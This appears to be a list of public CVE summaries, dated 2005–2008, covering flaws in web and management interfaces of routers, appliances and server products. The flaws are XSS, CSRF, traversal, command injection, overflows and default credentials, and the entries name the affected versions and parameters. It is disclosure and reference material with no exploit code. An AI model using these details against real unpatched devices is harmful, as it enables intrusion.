[CVE-2008-5184] The web interface (cgi-bin/admin.c) in CUPS before 1.3.8 uses the guest username when a user is not logged on to the web server, which makes it easier for remote attackers to bypass intended policy and conduct CSRF attacks via the (1) add and (2) cancel RSS subscription functions.
[CVE-2008-5043] Multiple cross-site scripting (XSS) vulnerabilities in the web-based interface in IBM Metrica Service Assurance Framework allow remote authenticated users to inject arbitrary web script or HTML via (1) the elementid parameter in a generatedreportresults action to the ReportTree program, (2) the jnlpname parameter to the Launch program, or (3) the :tasklabel parameter to the ReportRequest program, related to the name of a report.
[CVE-2008-4742] Multiple cross-site scripting (XSS) vulnerabilities in interface/Login.php in TimeTrex 2.2.11 allow remote attackers to inject arbitrary web script or HTML via the (1) password and (2) user_name parameters.
[CVE-2008-4419] Directory traversal vulnerability in the HP JetDirect web administration interface in the HP-ChaiSOE 1.0 embedded web server on the LaserJet 9040mfp, LaserJet 9050mfp, and Color LaserJet 9500mfp before firmware 08.110.9
[CVE-2008-4380] The web interface in Samsung DVR SHR2040 allows remote attackers to cause a denial of service (crash) via a malformed HTTP request, related to the filter for configuration properties and "/x" characters.
[CVE-2008-4216] The plug-in interface in WebKit in Apple Safari before 3.2 does not prevent plug-ins from accessing local URLs, which allows remote attackers to obtain sensitive information via vectors that "launch local files."
[CVE-2008-3939] Directory traversal vulnerability in the web interface in AVTECH PageR Enterprise before 5.0.7 allows remote attackers to read arbitrary files via directory traversal sequences in the URI.
[CVE-2008-3936] The web interface in Dreambox DM500C allows remote attackers to cause a denial of service (application hang) via a long URI.
[CVE-2008-3501] Cross-site scripting (XSS) vulnerability in the WebAccess simple interface in Novell Groupwise 7.0.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-3126] Multiple stack-based buffer overflows in the ServerView web interface (SnmpGetMibValues.exe) in Fujitsu Siemens Computers ServerView 04.60.07 and earlier allow remote authenticated users to execute arbitrary code via a crafted URL.
[CVE-2008-3081] Multiple unspecified "input validation" vulnerabilities in the Web management interface (aka Messaging Administration interface) in Avaya Message Storage Server (MSS) 3.x and 4.0, and possibly Communication Manager 3.1.x, allow remote authenticated administrators to execute arbitrary commands as user vexvm via vectors related to (1) SFTP Remote Store configuration
[CVE-2008-2929] Multiple cross-site scripting (XSS) vulnerabilities in the adminutil library in the Directory Server Administration Express and Directory Server Gateway (DSGW) web interface in Red Hat Directory Server 7.1 before SP7 and 8 EL4 and EL5, and Fedora Directory Server, allow remote attackers to inject arbitrary web script or HTML via input values that use % (percent) escaping.
[CVE-2008-2824] Unspecified vulnerability in the Extensible Interface Platform in Web Services in Xerox WorkCentre 7655, 7665, and 7675 allows remote attackers to make configuration changes via unknown vectors.
[CVE-2008-2814] Cross-site scripting (XSS) vulnerability in WallCity-Server Shoutcast Admin Panel 2.0 allows remote attackers to inject arbitrary web script or HTML via the username parameter to the login interface. NOTE: the provenance of this information is unknown
[CVE-2008-2751] Multiple cross-site scripting (XSS) vulnerabilities in the Glassfish webadmin interface in Sun Java System Application Server 9.1_01 allow remote attackers to inject arbitrary web script or HTML via the (1) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:jndiProp:JndiNew, (2) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:resTypeProp:resType, (3) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:factoryClassProp:factoryClass, or (4) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:descProp:desc parameter to (a) resourceNode/customResourceNew.jsf
[CVE-2008-2654] Off-by-one error in the read_client function in webhttpd.c in Motion 3.2.10 and earlier might allow remote attackers to execute arbitrary code via a long request to a Motion HTTP Control interface, which triggers a stack-based buffer overflow with some combinations of processor architecture and compiler.
[CVE-2008-2474] Buffer overflow in x87 before 3.5.5 in ABB Process Communication Unit 400 (PCU400) 4.4 through 4.6 allows remote attackers to execute arbitrary code via a crafted packet using the (1) IEC60870-5-101 or (2) IEC60870-5-104 communication protocol to the X87 web interface.
[CVE-2008-2272] Multiple cross-site scripting (XSS) vulnerabilities in the web interface in Aruba Mobility Controller 2.4.8.x-FIPS, 2.5.5.x, 2.5.6.x, 3.1.1.x, 3.2.0.x, and 3.3.1.x allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-2268] Open redirect vulnerability in interface/redirect.htm.php in Mjguest 6.7 GT Rev.01 allows user-assisted remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the goto parameter in a redirect action to mjguest.php. NOTE: this is user-assisted because there is a delay and a notification before redirection occurs.
[CVE-2008-2187] Cross-site scripting (XSS) vulnerability in mjguest.php in Mjguest 6.7 GT Rev.01 allows remote attackers to inject arbitrary web script or HTML via the level parameter in a redirect action, possibly involving interface/redirect.htm.php.
[CVE-2008-2104] The WebService in Bugzilla 3.1.3 allows remote authenticated users without canconfirm privileges to create NEW or ASSIGNED bug entries via a request to the XML-RPC interface, which bypasses the canconfirm check.
[CVE-2008-2071] Multiple cross-site request forgery (CSRF) vulnerabilities in the WHM interface 11.15.0 for cPanel 11.18 before 11.18.4 and 11.22 before 11.22.3 allow remote attackers to perform unauthorized actions as cPanel administrators via requests to cpanel/whm/webmail and other unspecified vectors.
[CVE-2008-1548] Multiple cross-site scripting (XSS) vulnerabilities in Aeries Browser Interface (ABI) 3.8.3.14 in Eagle Software Aries Student Information System allow remote attackers to inject arbitrary web script or HTML via the (1) UserName parameter to loginproc.asp and the (2) usr parameter to Login.asp.
[CVE-2008-1543] The Advanced User Interface Pages in the ProST Web Management component on the Airspan WiMAX ProST have a certain default User ID and password, which makes it easier for remote attackers to obtain partial administrative access, a different vulnerability than CVE-2008-1262.
[CVE-2008-1503] Cross-site scripting (XSS) vulnerability in the web management interface in F5 BIG-IP 9.4.3 allows remote attackers to inject arbitrary web script or HTML via (1) the name of a node object, or the (2) sysContact or (3) sysLocation SNMP configuration field, aka "Audit Log XSS." NOTE: these issues might be resultant from cross-site request forgery (CSRF) vulnerabilities.
[CVE-2008-1267] The Siemens SpeedStream 6520 router allows remote attackers to cause a denial of service (web interface crash) via an HTTP request to basehelp_English.htm with a large integer in the Content-Length field.
[CVE-2008-1266] Multiple buffer overflows in the web interface on the D-Link DI-524 router allow remote attackers to cause a denial of service (device crash) or possibly have unspecified other impact via (1) a long username or (2) an HTTP header with a large name and an empty value.
[CVE-2008-1260] Multiple cross-site request forgery (CSRF) vulnerabilities on the Zyxel P-2602HW-D1A router with 3.40(AJZ.1) firmware allow remote attackers to (1) make the admin web server available on the Internet (WAN) interface via the WWWAccessInterface parameter to Forms/RemMagWWW_1 or (2) change the IP whitelisting timeout via the StdioTimout parameter to Forms/rpSysAdmin_1.
[CVE-2008-1251] Cross-site scripting (XSS) vulnerability in the web interface on the central phone server for the Snom 320 SIP Phone allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-1250] Multiple cross-site request forgery (CSRF) vulnerabilities in the web interface on the central phone server for the Snom 320 SIP Phone allow remote attackers to perform actions as the phone user, as demonstrated by inserting an address-book entry containing an XSS sequence.
[CVE-2008-1248] The web interface on the central phone server for the Snom 320 SIP Phone allows remote attackers to make arbitrary phone calls via the "Call a number" field. NOTE: this might overlap CVE-2007-3440.
[CVE-2008-1247] The web interface on the Linksys WRT54g router with firmware 1.00.9 does not require credentials when invoking scripts, which allows remote attackers to perform arbitrary administrative actions via a direct request to (1) Advanced.tri, (2) AdvRoute.tri, (3) Basic.tri, (4) ctlog.tri, (5) ddns.tri, (6) dmz.tri, (7) factdefa.tri, (8) filter.tri, (9) fw.tri, (10) manage.tri, (11) ping.tri, (12) PortRange.tri, (13) ptrigger.tri, (14) qos.tri, (15) rstatus.tri, (16) tracert.tri, (17) vpn.tri, (18) WanMac.tri, (19) WBasic.tri, or (20) WFilter.tri. NOTE: the Security.tri vector is already covered by CVE-2006-5202.
[CVE-2008-1202] Cross-site scripting (XSS) vulnerability in the web management interface in Adobe LiveCycle Workflow 6.2 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2008-1073] Cross-site scripting (XSS) vulnerability in the report interface in Internet Security Systems (ISS) Internet Scanner 7.0 Service Pack 2 Build 7.2.2005.52 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-1052] The administration web interface in NetWin SurgeFTP 2.3a2 and earlier allows remote attackers to cause a denial of service (daemon crash) via a large integer in the Content-Length HTTP header, which triggers a NULL pointer dereference when memory allocation fails.
[CVE-2008-1037] Cross-site scripting (XSS) vulnerability in the file listing function in the web management interface in Packeteer PacketShaper and PolicyCenter 8.2.2 allows remote attackers to inject arbitrary web script or HTML via the FILELIST parameter to an arbitrary component, which triggers injection into an Error Report page.
[CVE-2008-0941] Cross-site scripting (XSS) vulnerability in Eagle Software Aeries Browser Interface (ABI) 3.8.2.8 allows remote authenticated users to inject arbitrary web script or HTML via an event.
[CVE-2008-0925] Cross-site scripting (XSS) vulnerability in the iMonitor interface in Novell eDirectory 8.7.3.x before 8.7.3 sp10, and 8.8.x before 8.8.2 ftf2, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters that are used within "error messages of the HTTP stack."
[CVE-2008-0838] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface in Sophos ES1000 and ES4000 Email Security Appliance 2.1.0.0 allow remote attackers to inject arbitrary web script or HTML via the (1) error and (2) go parameters to the login page.
[CVE-2008-0564] Multiple cross-site scripting (XSS) vulnerabilities in Mailman before 2.1.10b1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to (1) editing templates and (2) the list's "info attribute" in the web administrator interface, a different vulnerability than CVE-2006-3636.
[CVE-2008-0265] Multiple cross-site scripting (XSS) vulnerabilities in the Search function in the web management interface in F5 BIG-IP 9.4.3 allow remote attackers to inject arbitrary web script or HTML via the SearchString parameter to (1) list_system.jsp, (2) list_pktfilter.jsp, (3) list_ltm.jsp, (4) resources_audit.jsp, and (5) list_asm.jsp in tmui/Control/jspmap/tmui/system/log/
[CVE-2008-0071] The Web UI interface in (1) BitTorrent before 6.0.3 build 8642 and (2) uTorrent before 1.8beta build 10524 allows remote attackers to cause a denial of service (application crash) via an HTTP request with a malformed Range header.
[CVE-2007-6730] Multiple cross-site request forgery (CSRF) vulnerabilities in the web management interface in the ZyXEL P-330W router allow remote attackers to hijack the authentication of administrators for requests that (1) enable remote router management via goform/formRmtMgt or (2) modify the administrator password via goform/formPasswordSetup.
[CVE-2007-6729] Cross-site scripting (XSS) vulnerability in the web management interface in the ZyXEL P-330W router allows remote attackers to inject arbitrary web script or HTML via the pingstr parameter and other unspecified vectors.
[CVE-2007-6700] Cross-site scripting (XSS) vulnerability in cgi-bin/bgplg in the web interface for the BGPD daemon in OpenBSD 4.1 allows remote attackers to inject arbitrary web script or HTML via the cmd parameter.
[CVE-2007-6477] Cross-site scripting (XSS) vulnerability in the on-line help feature in Citrix Web Interface 2.0 and earlier, and NFuse, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-6193] The web management interface in Citrix NetScaler 8.0 build 47.8 stores the device's primary IP address in a cookie, which might allow remote attackers to obtain sensitive network configuration information if this address is not the same as the address being used by the web interface.
[CVE-2007-6192] The web management interface in Citrix NetScaler 8.0 build 47.8 uses weak encryption (XOR of unpadded data) to store credentials within a cookie, which makes it easier for remote attackers to obtain cleartext credentials when a cookie is captured via a known-plaintext attack.
[CVE-2007-6054] Cross-site scripting (XSS) vulnerability in the login page in the management interface in the Aruba 800 Mobility Controller 2.5.4.18 and earlier, and 2.4.8.6-FIPS and earlier, allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to the /screens URI, related to the url variable.
[CVE-2007-5930] Cross-site scripting (XSS) vulnerability in the web interface in Cerberus FTP Server before 2.46 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-5703] Multiple cross-site scripting (XSS) vulnerabilities in (1) Request-spk.xuda and (2) Add-msie-request.xuda in RSA KEON Registration Authority Web Interface 1.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-5539] Unspecified vulnerability in Cisco Unified Intelligent Contact Management Enterprise (ICME), Unified ICM Hosted (ICMH), Unified Contact Center Enterprise (UCCE), Unified Contact Center Hosted (UCCH), and System Unified Contact Center Enterprise (SUCCE) 7.1(5) allows remote authenticated users to gain privileges, and read reports or change the SUCCE configuration, via certain web interfaces, aka CSCsj55686.
[CVE-2007-5419] The 3Com 3CRWER100-75 router with 1.2.10ww software, when enabling an optional virtual server, configures this server to accept all source IP addresses on the external (Internet) interface unless the user selects other options, which might expose the router to unintended incoming traffic from remote attackers, as demonstrated by setting up a virtual server on port 80, which allows remote attackers to access the web management interface.
[CVE-2007-5058] Cross-site scripting (XSS) vulnerability in the Web administration interface in Barracuda Spam Firewall before firmware 3.5.10.016 allows remote attackers to inject arbitrary web script or HTML via the username field in a login attempt, which is not properly handled when the Monitor Web Syslog screen is open.
[CVE-2007-5046] Cross-site scripting (XSS) vulnerability in the Webmail interface for IceWarp Merak Mail Server before 9.0.0 allows remote attackers to inject arbitrary JavaScript via a javascript: URI in an attribute of an element in an email message body, as demonstrated by the onload attribute in a BODY element.
[CVE-2007-4733] The Aztech DSL600EU router, when WAN access to the web interface is disabled, does not properly block inbound traffic on TCP port 80, which allows remote attackers to connect to the web interface by guessing a TCP sequence number, possibly involving spoofing of an ARP packet, a related issue to CVE-1999-0077.
[CVE-2007-4592] Multiple cross-site scripting (XSS) vulnerabilities in the web interface for IBM Rational ClearQuest before 2003.06.16 Patch 2008A, 7.0.0.2_iFix01, and 7.0.1.1_iFix01 allow remote attackers to inject arbitrary web script or HTML via the (1) contextid, (2) username, (3) userNameVal, and (4) schema parameters to the login component.
[CVE-2007-4555] Cross-site scripting (XSS) vulnerability in Ipswitch WS_FTP allows remote attackers to inject arbitrary web script or HTML via arguments to a valid command, which is not properly handled when it is displayed by the view log option in the administration interface. NOTE: this can be leveraged to create a new admin account.
[CVE-2007-4539] The WebService (XML-RPC) interface in Bugzilla 2.23.3 through 3.0.0 does not enforce permissions for the time-tracking fields of bugs, which allows remote attackers to obtain sensitive information via certain XML-RPC requests, as demonstrated by the (1) Deadline and (2) Estimated Time fields.
[CVE-2007-4529] The WebAdmin interface in TeamSpeak Server 2.0.20.1 allows remote authenticated users with the ServerAdmin flag to assign Registered users certain privileges, resulting in a privilege set that extends beyond that ServerAdmin's own servers, as demonstrated by the (1) AdminAddServer, (2) AdminDeleteServer, (3) AdminStartServer, and (4) AdminStopServer privileges
[CVE-2007-4350] Cross-site scripting (XSS) vulnerability in the management interface in HP SiteScope 9.0 build 911 allows remote attackers to inject arbitrary web script or HTML via an SNMP trap message.
[CVE-2007-4348] Cross-site scripting (XSS) vulnerability in the CAD service in IBM Tivoli Storage Manager (TSM) Client 5.3.5.3 and 5.4.1.2 for Windows allows remote attackers to inject arbitrary web script or HTML via HTTP requests to port 1581, which generate log entries in a dsmerror.log file that is accessible through a certain web interface.
[CVE-2007-4318] Cross-site scripting (XSS) vulnerability in Forms/General_1 in the management interface in ZyNOS firmware 3.62(WK.6) on the Zyxel Zywall 2 device allows remote authenticated administrators to inject arbitrary web script or HTML via the sysSystemName parameter.
[CVE-2007-4301] Multiple cross-site scripting (XSS) vulnerabilities in the management interface in WebCart 2.20 through 2.25 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-4122] Unspecified vulnerability in Hitachi JP1/Cm2/Hierarchical Viewer (HV) 06-00 through 06-71-/B allows remote attackers to cause a denial of service (application stop and web interface outage) via certain "unexpected data."
[CVE-2007-4106] SQL injection vulnerability in login.asp in CodeWidgets Pay Roll - Time Sheet and Punch Card Application With Web Interface allows remote attackers to execute arbitrary SQL commands via the Password parameter.
[CVE-2007-3769] Cross-site scripting (XSS) vulnerability in the mirrored server management interface in SurgeFTP 2.3a1 allows user-assisted, remote FTP servers to inject arbitrary web script or HTML via a malformed response without a status code, which is reflected to the user in the resulting error message. NOTE: this can be leveraged for root access via a sequence of steps involving web script that creates a new FTP user account.
[CVE-2007-3572] Incomplete blacklist vulnerability in cgi-bin/runDiagnostics.cgi in the web interface on the Yoggie Pico and Pico Pro allows remote attackers to execute arbitrary commands via shell metacharacters in the param parameter, as demonstrated by URL encoded "`" (backtick) characters (%60 sequences).
[CVE-2007-3263] Unspecified vulnerability in the Default Messaging Component in IBM WebSphere Application Server (WAS) 6.1.0.7 and earlier has unknown impact and attack vectors, related to "incorrect authorization on a remote interface to the SDO repository."
[CVE-2007-3151] rpttop.htm in the web management interface in Packeteer PacketShaper 7.3.0g2 and 7.5.0g1 allows remote attackers to cause a denial of service (device reboot) via a request with empty values of the OP.MEAS.DATAQUERY and MEAS.TYPE parameters.
[CVE-2007-3012] The web interface in Fujitsu-Siemens Computers PRIMERGY BX300 Switch Blade allows remote attackers to obtain sensitive information by canceling the authentication dialog when accessing a sub-page, which still displays the form field contents of the sub-page, as demonstrated using (1) config/ip_management.htm and (2) config/snmp_config.htm.
[CVE-2007-3011] The DBAsciiAccess CGI Script in the web interface in Fujitsu-Siemens Computers ServerView before 4.50.09 allows remote attackers to execute arbitrary commands via shell metacharacters in the Servername subparameter of the ParameterList parameter.
[CVE-2007-2952] Multiple stack-based buffer overflows in the filter service (aka k9filter.exe) in Blue Coat K9 Web Protection 3.2.44 with Filter 3.2.32 allow (1) remote attackers to execute arbitrary code via a long HTTP Referer header to the K9 Web Protection Administration interface and (2) man-in-the-middle attackers to execute arbitrary code via an HTTP response with a long HTTP version field.
[CVE-2007-2680] Cross-site scripting (XSS) vulnerability in the management interface in Canon Network Camera Server VB100 and VB101 with firmware 3.0 R69 and earlier, and VB150 with firmware 1.1 R39 and earlier, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-2159] Multiple cross-site scripting (XSS) vulnerabilities in the Database Administration (dba) module 4.6.x-*, and before 4.7.x-1.2 in the 4.7.x-1.* series, for Drupal allow remote attackers to inject arbitrary web script or HTML via unspecified vectors relating to (1) direct display of data from the database and (2) other portions of the user interface.
[CVE-2007-1622] Cross-site scripting (XSS) vulnerability in wp-admin/vars.php in WordPress before 2.0.10 RC2, and before 2.1.3 RC2 in the 2.1 series, allows remote authenticated users with theme privileges to inject arbitrary web script or HTML via the PATH_INFO in the administration interface, related to loose regular expression processing of PHP_SELF.
[CVE-2007-1485] ** DISPUTED ** Buffer overflow in the set_umask function in QFTP in LIBFtp 3.1-1 allows local users to execute arbitrary code via a long -m argument. NOTE: CVE disputes this issue because QFTP is not setuid, and it is unlikely that there are web interfaces to QFTP that would accept untrusted command line arguments.
[CVE-2007-1426] The web interface in AstroCam 2.0.0 through 2.6.5 allows remote attackers to cause a denial of service (daemon shutdown) via requests that contain a large amount of data in the "a" variable, which "fills up the message queue."
[CVE-2007-1229] Cross-site scripting (XSS) vulnerability in the Nullsoft ShoutcastServer 1.9.7 allows remote attackers to inject arbitrary web script or HTML via the top-level URI on the Incoming interface (port 8001/tcp), which is not properly handled in the administrator interface when viewing the log file.
[CVE-2007-1169] The web interface in Trend Micro ServerProtect for Linux (SPLX) 1.25, 1.3, and 2.5 before 20070216 accepts logon requests through unencrypted HTTP, which might allow remote attackers to obtain credentials by sniffing the network.
[CVE-2007-1168] Trend Micro ServerProtect for Linux (SPLX) 1.25, 1.3, and 2.5 before 20070216 allows remote attackers to access arbitrary web pages and reconfigure the product via HTTP requests with the splx_2376_info cookie to the web interface port (14942/tcp).
[CVE-2007-1036] The default configuration of JBoss does not restrict access to the (1) console and (2) web management interfaces, which allows remote attackers to bypass authentication and gain administrative access via direct requests.
[CVE-2007-0564] The license registering interface in Symantec Web Security (SWS) before 3.0.1.85 allows attackers to cause a denial of service (CPU consumption) by submitting a large file.
[CVE-2007-0011] The web portal interface in Citrix Access Gateway (aka Citrix Advanced Access Control) before Advanced Edition 4.5 HF1 places a session ID in the URL, which allows context-dependent attackers to hijack sessions by reading "residual information", including a referer log, browser history, or browser cache.
[CVE-2006-6539] Multiple buffer overflows in Winamp Web Interface (Wawi) 7.5.13 and earlier (1) allow remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via an (a) long username or a (b) crafted packet to the FindBasicAuth function in security.cpp, related to the /browse URI
[CVE-2006-6514] Winamp Web Interface (Wawi) 7.5.13 and earlier uses an insufficient comparison to determine whether a directory is located below the application's root directory, which allows remote authenticated users to access certain other directories if the name of the root directory is a substring of the name of the target directory, as demonstrated by accessing C:\folder2 when the root directory is C:\folder.
[CVE-2006-6513] The CControl::Download function (/dl URI) in Winamp Web Interface (Wawi) 7.5.13 and earlier allows remote authenticated users to download arbitrary file types under the root via a trailing "." (dot) in a filename in the file parameter, related to erroneous behavior of the IsWinampFile function.
[CVE-2006-6512] Directory traversal vulnerability in the Browse function (/browse URI) in Winamp Web Interface (Wawi) 7.5.13 and earlier allows remote authenticated users to list arbitrary directories via URL encoded backslashes ("%2F") in the path parameter.
[CVE-2006-6454] execInBackground.php in J-OWAMP Web Interface 2.1b and earlier allows remote attackers to execute arbitrary commands via shell metacharacters to the (1) exe and (2) args parameters, which are used in an exec function call. NOTE: the provenance of this information is unknown
[CVE-2006-6453] PHP remote file inclusion vulnerability in JOWAMP_ShowPage.php in J-OWAMP Web Interface 2.1 allows remote authenticated users to execute arbitrary PHP code via a URL in the link parameter.
[CVE-2006-6434] Unspecified vulnerability in the Web User Interface in Xerox WorkCentre and WorkCentre Pro before 12.050.03.000, 13.x before 13.050.03.000, and 14.x before 14.050.03.000 allows remote attackers to bypass authentication controls via unknown vectors.
[CVE-2006-6427] The Web User Interface in Xerox WorkCentre and WorkCentre Pro before 12.060.17.000, 13.x before 13.060.17.000, and 14.x before 14.060.17.000 allows remote attackers to execute arbitrary commands via unspecified vectors involving "command injection" in (1) the TCP/IP hostname, (2) Scan-to-mailbox folder names, and (3) certain parameters in the Microsoft Networking configuration. NOTE: vector 1 might be the same as CVE-2006-5290.
[CVE-2006-5862] Directory traversal vulnerability in the session mechanism of the web interface for Network Administration Visualized (NAV) before 3.1.1 allows attackers with filesystem write access to have an unknown impact via unknown attack vectors.
[CVE-2006-5743] Multiple cross-site scripting (XSS) vulnerabilities in Highwall Enterprise and Highwall Endpoint 4.0.2.11045 management interface allow remote attackers to inject arbitrary web script or HTML via (1) an Access Point with a crafted SSID, (2) the name of the sensor WIDS, (3) the name of the Highwall EndPoint workstation, or other unspecified vectors.
[CVE-2006-5515] Cross-site scripting (XSS) vulnerability in lib-history.inc.php in phpAdsNew and phpPgAds before 2.0.8-pr1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to injected data that is stored by a delivery script and displayed by the admin interface.
[CVE-2006-5408] Multiple cross-site scripting (XSS) vulnerabilities in the wireless IDS management interface for Highwall Enterprise and Highwall Endpoint 4.0.2.11045 allow remote attackers to inject arbitrary HTML or web script via unspecified vectors.
[CVE-2006-4910] The web administration interface (mainApp) to Cisco IDS before 4.1(5c), and IPS 5.0 before 5.0(6p1) and 5.1 before 5.1(2) allows remote attackers to cause a denial of service (unresponsive device) via a crafted SSLv2 Client Hello packet.
[CVE-2006-4660] Multiple cross-site scripting (XSS) vulnerabilities in the RSS Feed module in AOL ICQ Toolbar 1.3 for Internet Explorer (toolbaru.dll) allow remote attackers to process arbitrary web script or HTML in the Feeds interface context via the (1) title and (2) description elements within an item element in an RSS feed.
[CVE-2006-4523] The web-based management interface in 2Wire, Inc. HomePortal and OfficePortal Series modems and routers allows remote attackers to cause a denial of service (crash) via a CRLF sequence in a GET request.
[CVE-2006-3907] Siemens SpeedStream 2624 allows remote attackers to cause a denial of service (device hang) by sending a crafted packet to the web administrative interface.
[CVE-2006-3567] Cross-site scripting (XSS) vulnerability in the web administration interface logging feature in Juniper Networks (Redline) DX 5.1.x, and possibly earlier versions, allows remote attackers to inject arbitrary web script or HTML via the username login field.
[CVE-2006-3291] The web interface on Cisco IOS 12.3(8)JA and 12.3(8)JA1, as used on the Cisco Wireless Access Point and Wireless Bridge, reconfigures itself when it is changed to use the "Local User List Only (Individual Passwords)" setting, which removes all security and password configurations and allows remote attackers to access the system.
[CVE-2006-3289] Cross-site scripting (XSS) vulnerability in the login page of the HTTP interface for the Cisco Wireless Control System (WCS) for Linux and Windows before 3.2(51) allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving a "malicious URL".
[CVE-2006-2925] Cross-site scripting (XSS) vulnerability in the web interface in Ingate Firewall before 4.4.1 and SIParator before 4.4.1 allows remote attackers to inject arbitrary web script or HTML, and steal cookies, via unspecified vectors related to "XSS exploits" in administrator functionality.
[CVE-2006-2477] Cross-site scripting (XSS) vulnerability in the administrative interface in Bitrix Site Manager 4.1.x allows remote attackers to inject arbitrary web script or HTML via unspecified inputs.
[CVE-2006-2237] The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter.
[CVE-2006-2021] Absolute path traversal vulnerability in recordings/misc/audio.php in the Asterisk Recording Interface (ARI) web interface in Asterisk@Home before 2.8 allows remote attackers to read arbitrary MP3, WAV, and GSM files via a full pathname in the recording parameter. NOTE: this issue can also be used to determine existence of files.
[CVE-2006-2020] Asterisk Recording Interface (ARI) in Asterisk@Home before 2.8 stores recordings/includes/main.conf under the web document root with insufficient access control, which allows remote attackers to obtain password information.
[CVE-2006-1960] Cross-site scripting (XSS) vulnerability in the appliance web user interface in Cisco CiscoWorks Wireless LAN Solution Engine (WLSE) and WLSE Express before 2.13 allows remote attackers to inject arbitrary web script or HTML, possibly via the displayMsg parameter to archiveApplyDisplay.jsp, aka bug ID CSCsc01095.
[CVE-2006-1397] Multiple cross-site scripting (XSS) vulnerabilities in (a) phpAdsNew and (b) phpPgAds before 2.0.8 allow remote attackers to inject arbitrary web script or HTML via (1) certain parameters to the banner delivery module, which is not properly handled in the administrator interface, or (2) certain parameters to the login form.
[CVE-2006-1210] The web interface for IBM Tivoli Micromuse Netcool/NeuSecure 3.0.236 includes the MySQL database username and password in cleartext in body.phtml, which allows remote attackers to gain privileges by reading the source. NOTE: IBM has privately confirmed to CVE that a fix is available for these issues.
[CVE-2006-1044] Multiple buffer overflows in LISTSERV 14.3 and 14.4, including LISTSERV Lite and HPO, with the web archive interface enabled, allow remote attackers to execute arbitrary code via unknown attack vectors related to the WA CGI. NOTE: technical details will be released after the grace period has ended on 20060603.
[CVE-2006-0993] The web management interface in 3Com TippingPoint SMS Server before 2.2.1.4478 does not restrict access to certain directories, which might allow remote attackers to obtain potentially sensitive information such as configuration settings.
[CVE-2006-0571] Multiple cross-site scripting (XSS) vulnerabilities in phpstatus 1.0 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors in the administrative interface.
[CVE-2006-0507] Multiple cross-site scripting (XSS) vulnerabilities in Easy CMS allow remote attackers to inject arbitrary web script or HTML via (1) unknown attack vectors in the administrative interface and (2) input fields of the contact form.
[CVE-2005-4658] Multiple cross-site scripting (XSS) vulnerabilities in ASP-Programmers.com ASPKnowledgebase allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors in the administrative interface.
[CVE-2005-4583] Unspecified vulnerability in the Management Interface in VMware ESX Server 2.x up to 2.5.x before 24 December 2005 allows "remote code execution in the Web browser" via unspecified attack vectors, probably related to cross-site scripting (XSS).
[CVE-2005-4326] The web interface for American Power Conversion (APC) PowerChute Network Shutdown performs all communication in cleartext (base64-encoded), which allows remote attackers to sniff authentication credentials.
[CVE-2005-4142] The web interface for subscribing new users in Lyris ListManager 5.0 through 8.8b, in combination with a line wrap feature, allows remote attackers to execute arbitrary list administration commands via LFCR (%0A%0D) sequences in the pw parameter. NOTE: it is not clear whether this is a variant of a CRLF injection vulnerability.
[CVE-2005-3921] Cross-site scripting (XSS) vulnerability in Cisco IOS Web Server for IOS 12.0(2a) allows remote attackers to inject arbitrary web script or HTML by (1) packets containing HTML that an administrator views via an HTTP interface to the contents of memory buffers, as demonstrated by the URI /level/15/exec/-/buffers/assigned/dump.
[CVE-2005-3802] Belkin F5D7232-4 and F5D7230-4 wireless routers with firmware 4.03.03 and 4.05.03, when a legitimate administrator is logged into the web management interface, allow remote attackers to access the management interface without authentication.
[CVE-2005-3620] The management interface for VMware ESX Server 2.0.x before 2.0.2 patch 1, 2.1.x before 2.1.3 patch 1, and 2.x before 2.5.3 patch 2 records passwords in cleartext in URLs that are stored in world-readable web server log files, which allows local users to gain privileges.
[CVE-2005-3619] Cross-site scripting (XSS) vulnerability in the management interface for VMware ESX 2.5.x before 2.5.2 upgrade patch 2, 2.1.x before 2.1.2 upgrade patch 6, and 2.0.x before 2.0.1 upgrade patch 6 allows remote attackers to inject arbitrary web script or HTML via messages that are not sanitized when viewing syslog log files.
[CVE-2005-3102] The administrative interface in Movable Type allows attackers to upload files with arbitrary extensions under the web root.
[CVE-2005-3040] Directory traversal vulnerability in the web interface (ISALogin.dll) for TAC Vista 4.0, and possibly other versions before 4.3, allows remote attackers to read arbitrary files via ".." sequences in the Template parameter.
[CVE-2005-2584] The web administration interface in Mentor ADSL-FR4II router running firmware 2.00.0111 does not set a default password, which allows local users to gain access.
[CVE-2005-2424] The management interface for Siemens SANTIS 50 running firmware 4.2.8.0, and possibly other products including Ericsson HN294dp and Dynalink RTA300W, allows remote attackers to access the Telnet port without authentication via certain packets to the web interface that cause the interface to freeze.
[CVE-2005-2391] Unknown vulnerability in 3Com OfficeConnect Wireless 11g Access Point before 1.03.12 allows remote attackers to obtain sensitive information via the web interface.
[CVE-2005-2374] Belkin 54g wireless routers do not properly set an administrative password, which allows remote attackers to gain access via the (1) Telnet or (2) web administration interfaces.
[CVE-2005-2175] The web interface for Lotus Notes mail automatically processes HTML in an attachment without prompting the user to save or open it, which makes it easier for remote attackers to conduct web-based attacks and steal cookies.
